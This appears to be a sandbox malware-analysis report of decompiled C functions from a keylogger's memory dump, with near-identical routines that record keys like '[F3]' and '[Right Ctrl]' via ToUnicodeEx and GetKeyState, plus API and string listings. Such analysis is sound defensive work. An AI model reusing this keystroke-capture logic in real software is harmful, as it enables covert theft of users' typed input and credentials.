Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85BBF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85BBF(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F3]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85bbf
0x00c85bc6
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F3], xrefs: 00C85BC1

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85D68, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D68(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Right Ctrl]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85d68
0x00c85d6f
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Right Ctrl], xrefs: 00C85D6A
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85AC0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85AC0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F11]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85ac0
0x00c85ac7
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F11], xrefs: 00C85AC2

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85CBE, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85CBE(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Next Track]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85cbe
0x00c85cc5
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Next Track], xrefs: 00C85CC0

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85B8C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B8C(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F22]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85b8c
0x00c85b93
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F22], xrefs: 00C85B8E

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85AAF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85AAF(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F10]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
